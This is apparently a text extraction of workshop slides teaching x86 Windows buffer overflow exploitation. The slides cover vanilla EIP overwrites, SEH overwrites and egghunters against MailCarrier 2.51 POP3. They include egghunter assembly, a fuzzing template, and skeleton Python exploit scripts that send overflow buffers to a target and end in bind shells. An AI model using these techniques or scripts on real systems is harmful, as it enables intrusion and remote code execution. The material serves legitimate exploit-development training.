Upload
others
View
5
Download
0
Embed Size (px)
Citation preview
HacktoBasics–x86WindowsBasedBufferOverflows,anintroduc:ontobufferoverflowsInstructor-DinoCovotsos– TelspaceSystems
@telspacesystems
Whoami?
WorkinthePenetra:onTes:ngspace(TelspaceSystems)
Approximately20yearsin
Tryingtokeepsomesortofwork/lifebalance!;)
Variousqualifica:ons–OSCP/OSCEetc
Agenda
-Introduc:ontotheworkshop(Wearehere!).-TheStackandRegisters.-Basicx86ASM.-Basicexploita:ontechniques.-Fuzzing.-Introduc:ontovarietyofSkeletonPythonscripts(copypastebufferoverflows,remotebufferoverflowsetc).
Agenda
-VanillaEIPoverwritesinImmunityDebugger.-Overwri:ngEIP,JumpingtoESP,execu:ngShellcode(generatedbyMetasploitorcompiledfromexploit-db/shellstorm).-Badcharactersandhowtodealwiththem.-Prac:calexample(CVE-2019-11395).
Agenda
-Introduc:ontoSEHexploita:ontechniques.-Introduc:ontoMona,basicasmjumpsandshellcoding.-Prac:calexample(CVE-2019-11395).
Agenda
-Whatareegghunters?-Exampleofaegghunterbeingu:lisedinaSEHexploit.-Ques:onsandAnswers.-References.
TheStackandRegisters(x86)
REF:hep://flint.cs.yale.edu/cs421/papers/x86-asm/asm.html
TheStackandRegisters(x86)The832bitGeneralPurposeRegisters:Accumulatorregister(AX).Usedinarithme:copera:onsCounterregister(CX).Usedinshii/rotateinstruc:onsandloops.Dataregister(DX).Usedinarithme:copera:onsandI/Oopera:ons.Baseregister(BX).Usedasapointertodata(locatedinsegmentregisterDS,wheninsegmentedmode).StackPointerregister(SP).Pointertothetopofthestack.StackBasePointerregister(BP).Usedtopointtothebaseofthestack.SourceIndexregister(SI).Usedasapointertoasourceinstreamopera:ons.Des:na:onIndexregister(DI).Usedasapointertoades:na:oninstreamopera:ons.
Basicx86ASMX86ASM(forthisworkshop):add/subxormovpushpopcalljmp(andcondi:onaljumps)
Basicexploita:ontechniques“Vanilla”EIPOverwrite:DirectEIPoverwritewithini:allongbuffer(noexcep:onhandlerorsimilar)StructuredExcepDonHandling(SEH)exploitaDon:Anexcep:onisaneventthatoccursduringtheexecu:onofaprogram,andrequirestheexecu:onofcodeoutsidethenormalflowofcontrol.Structuredexcep:onhandlingisamechanismforhandlingbothhardwareandsoiwareexcep:ons.OverwriteSEHwithaPOPPOPRETinstruc:on,ESPmovedtowardshigherinstruc:onstwicethenaRETisexecuted.
REF:heps://docs.microsoi.com/en-us/windows/desktop/debug/structured-excep:on-handling
Basicexploita:ontechniquesStructuredExcepDonHandling(SEH)exploitaDon(conDnued):Typicalstructure:“A”buffer+(NextSEH)/JMP+PPR+(nops)+shellcode
Basicexploita:ontechniquesEgghunters:Aegghunterisasmallpieceofshellcodethatsearchesmemoryforalarger,biggershellcodewhereitmaybepossibletoexecutesaidshellcode(i.e.incaseswherethereisonlyasmallamountofspaceavailableinthebuffer,thisisveryuseful)Egghunterssearchfora“TAG”whichisaunique4bytestring,inmemory.Wethencombineastringtogethersothatitisunique,suchasWOOTWOOTorsimilarwherewewanttoexecuteouractualshellcodeoncefound(i.e.weredirectexecu:onflow).
Basicexploita:ontechniquesEgghunters,example:loop_inc_page:
or dx, 0x0!f // Add PAGE_SIZE-1 to edxloop_inc_one:
inc edx // Increment our pointer by oneloop_check:
push edx // Save edxpush 0x2 // Push NtAccessCheckAndAuditAlarmpop eax // Pop into eaxint 0x2e // Perform the syscallcmp al, 0x05 // Did we get 0xc0000005 (ACCESS_VIOLATION) ?pop edx // Restore edx
loop_check_8_valid:jeloop_inc_page//Yes,invalidptr,gotothenextpage
is_egg:
moveax,0x50905090//Throwoureggineaxmovedi,edx//Seteditothepointerwevalidatedscasd//Comparethedwordineditoeaxjnzloop_inc_one//Nomatch?Incrementthepointerbyonescasd//Comparethedwordineditoeaxagain(whichisnowedx+4)jnzloop_inc_one//Nomatch?Incrementthepointerbyone
matched:
jmpedi//Foundtheegg.Jump8bytespastitintoourcode.
REF:hep://www.hick.org/code/skape/papers/egghunt-shellcode.pdf&heps://www.fuzzysecurity.com/tutorials/expDev/4.html
FuzzingGoogleDefiniDon:Fuzzingorfuzztes:ngisanautomatedsoiwaretes:ngtechniquethatinvolvesprovidinginvalid,unexpected,orrandomdataasinputstoacomputerprogram.Theprogramisthenmonitoredforexcep:onssuchascrashes,failingbuilt-incodeasser:ons,orpoten:almemoryleaks.ManualTesDng(GeneraDon,mutaDon,manualcodingetc)Tools:Spike,Boofuzz,Peach,Sulleyetc
FuzzingBasicSpikeTemplate:s_string_variable("USER");s_string(" ");s_string_variable(”FOO");s_string("\r\n");s_string("PASS");s_string_variable(”F00");s_string_variable("\r\n");
SkeletonPythonScriptsOnyourUSB/VMthereareaddi:onalscripts:Copy/PasteSkeletonPythonScripts(LocalBOFexample,SEH)Shellcode = “<SHELLCODE>” buffer = "A" * 884 + NSEH + SEH" + NOPS + shellcode + "D" * 8868 payload = buffer try: f=open("exploit.txt","w") print "[+] Creating %s bytes payload.." %len(payload) f.write(payload) f.close() print "[+] File created!" except: print "File cannot be created”
SkeletonPythonScriptsSocketBasedSkeletonPythonScripts(LocalBOFexample,Vanilla)buffer = "A" * 5094 + ”JMP ESP" + NOPS + "C" * (882-len(shellcode)) print "[*] MailCarrier 2.51 POP3 Buffer Overflow in USER command\r\n" print "[*] Sending pwnage buffer: with %s bytes..." %len(buffer) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect=s.connect(("192.168.0.150", 110)) print s.recv(1024) s.send('USER ' + buffer + '\r\n') print s.recv(1024) s.send('QUIT\r\n') s.close() time.sleep(1) print "[*] Done, but if you get here the exploit failed!"
VanillaEIPOverwrite
41414141–TheMagicNumbers.
Ouraiminthispor:onoftheworkshopistooverwritetheEIPregisterbysendingalongstring,whichwillallowustoredirectprogramexecu:onflowtoshellcodeofourchoosing.Inthiscase,itwouldbecalc.exeorabindshell.
VanillaEIPOverwrite(MailCarrier)
VanillaEIPOverwrite(MailCarrier)
AeachingtotheMailCarrierprocess,usingImmunityDebugger(onyourVM)
VanillaEIPOverwrite(MailCarrier)
VanillaEIPOverwrites(MailCarrier)
SkeletonPythonScript,whichwillsend6000A’svia“USER”(onyourVM)
VanillaEIPOverwrite(MailCarrier)
Overwri:ngEIPwith“41414141”
VanillaEIPOverwrite(MailCarrier)
Genera:ngauniquepaeernwithmsf-paeern_createwithlength6000
VanillaEIPOverwrite(MailCarrier)
Pythonscript,withuniquepaeerntosendtoMailCarrier
VanillaEIPOverwrite(MailCarrier)
Execu:ngthescript,whichcarriestheuniquepaeern.
VanillaEIPOverwrite(MailCarrier)
ObtainingEIPoverwritewithauniquepaeern,wecopythisvaluetofindtheexactoffset.
VanillaEIPOverwrite(MailCarrier)
Usingmsf-paeern_offsetinordertoobtaintheexactoffset,inthiscase5094bytes.
VanillaEIPOverwrite(MailCarrier)
Wecreateour“B”buffer,toconfirmtheexactoffsetandEIPoverwrite.
VanillaEIPOverwrite(MailCarrier)
ConfirmingthecorrectoffsetandEIPoverwritevia42424242(“B”*4)
VanillaEIPOverwrite(MailCarrier)
WesearchforaJMPESPtooverwriteEIPwith,viamonawith“!monajmp–resp”
VanillaEIPOverwrite(MailCarrier)
AddingtheJMPtothePythonscript.
VanillaEIPOverwrite(MailCarrier)
Weplaceabreakpointatthataddress,andwaitforthebreakpointtobehit,confirmingjmp.
VanillaEIPOverwrite(MailCarrier)
Westepthroughtheinstruc:onsandconfirmthatwelandinour“C”buffer.
VanillaEIPOverwrite(MailCarrier)
Genera:ngourbind_tcpshellcode,withmsfvenom.
VanillaEIPOverwrite(MailCarrier)
PlacingitintoourPythonscript(1/2).
VanillaEIPOverwrite(MailCarrier)
PlacingitintoourPythonscript(2/2).
VanillaEIPOverwrite(MailCarrier)
Execu:ngourPythonscript(fullexploit).
VanillaEIPOverwrite(MailCarrier)
Obtainingourbindshellonport443.
VanillaEIPOverwrite(MailCarrier)
UsingMeterpretertoconnecttothebindshell.
SEHexploita:on
41414141–SDllthemagicnumbers,justdifferent!
Structuredexcep:onhandlingexploitscompromiseanapplica:onbyoverwri:ngthepointerofanexcep:onhandlerwithanaeackercontrolledaddress.The“StructuredExcepDonHandler(SEH)”isaprotec:onmechanismthatwasimplementedtomi:gatetheabuseofbufferoverflows,butitisahighlyflawedone.
REF:heps://www.fuzzysecurity.com/tutorials/expDev/3.html
SEHexploita:on
SkeletonPythonscripttoexploittheLISTcommand,postauthen:ca:on(test/test)
SEHexploita:on
Sending10000A’sviatheLISTcommand.
SEHexploita:on
EIPisnotoverwrieen,butwecon:nueprogramexecu:on.
SEHexploita:on
EIPisnowoverwrieen,theSEHchainourA’s.
SEHexploita:on
Inthesamewayasthepreviousexploit,weusemsftocreateauniquepaeernwith10000bytes.
SEHexploita:on
Pythonscriptwiththepaeern.
SEHexploita:on
SEHchainshowsoverwrite,wethenmatchthatwithmsf-paeern_offsetto6178bytes.
SEHexploita:on
Wemodifyourbuffertooverwritensehandsehwith“BBBB”and“CCCC”.
SEHexploita:on
SEHChainnowshowswecontrolnsehandsehaccordingly.
SEHexploita:on
Weuse“!monaseh”tosearchforaPOPPOPRETinstruc:on.
SEHexploita:on
OurPPRinstruc:onisthenaddedtoourexploit,withnsehaddedas“G”*4.
SEHexploita:on
WeplaceabreakpointatourPPRinstruc:on,tomakesureitisbeingexecutedproperly.
SEHexploita:on
WeexecuteourPPRinstruc:on,andjumptoour4“G”buffer,whichwecannowusetojump.
SEHexploita:on
Weusethese4bytes,toassembleaJMPSHORTtoavalueaierthehandler(EB12)
SEHexploita:on
WemodifyourPythonscripttoaddournsehjumpandsomenops(wewanttolandinthenops).
SEHexploita:on
Usingbreakpointsandsteppingthrough,wefinallylandinournopsandcanaddourshellcode.
SEHexploita:on
Usingmsfvenom,wegenerateourbindshellonceagain.
SEHexploita:on
Weaddthistoourfinalexploit(1/2).
SEHexploita:on
Weaddthistoourfinalexploit(2/2).
SEHexploita:on
WethenrunthefinalPythonexploit,andhopetogetabindshellonthetarget.
SEHexploita:on
Success,wehaveourbindshellwai:ngonport443.
SEHexploita:on
ConnectedtoourbindshellviaMSF.
Egghunters
Playingwithlimitedbufferspacecanbefun!Anegghunterisasmallpieceofshellcodethatwillsearchmemoryforaspecificpaeern.Oncethisisfound,itwillthenexecutethefullshellcodeinalargerareaofavailablebufferspace(some:mesdoneviaanotherstoredvariable).WewillexpandupontheSEHexploitfromthepreviousexample,withtheuseofaegghuntertofindourshellcode.
Addi:onalinforma:on:heps://www.corelan.be/index.php/2010/01/09/exploit-wri:ng-tutorial-part-8-win32-egg-hun:ng/
Egghunters
WestartwithourskeletonPythonscript,whichusesnseh,sehandnops(noshellcodethis:me).
Egghunters
Welandinournopsasexpected,whichwillallowustocreateandexecuteouregghunter.
Egghunters
Usingmsf-egghuntertogenerateouregghunter,withx00astheonlybadchar,tagofWOOT.
Egghunters
Addingtheegghuntertoourcode,alsoincludingtheWOOTWOOTtagjustaierini:al“A”buffer
Egghunters
Execu:ngourscriptwithourEgghunter,ifallgoeswellweshouldfindWOOTWOOTinmemory.
Egghunters
Ouregghuntertagisfound,wecannowplacenopsandshellcode!
Egghunters
Onceagain,wegenerateourshellcodeusingmsfvenom.
Egghunters
Addingtheshellcodetoourexploit(1/2).
Egghunters
Addingtheshellcodetoourexploit(2/2).
Egghunters
Runningourfinalexploitwithegghunterandshellcode.
Egghunters
Bysexngbreakpointsandsteppingthroughtheexecu:on,wecanseeouregghunter.
Egghunters
Wesetanotherstrategicbreakpoint,aierourWOOTWOOTisfoundinmemory,thencon:nue.
Egghunters
Toconfirm,wefindourtaginmemory,followedbyournopsandshellcode.
Egghunters
Wecon:nueexecu:on,findournopsandshellcodeexecutescorrectly.
Egghunters
Bindshellwai:ngonport443forustoconnectto.
Egghunters
Connec:ngtoourbindshell!
@telspacesystemswww.telspace.co.za
Referencesandthanksto:FuzzySecurityCorelan(Peter!)
OffsecMaeMiller(skape)
DEFCON(Jeff,Nikita,Highwiz,Toeenkophandallcrew)TheTelspaceSystemsCrew(heps://www.telspace.co.za)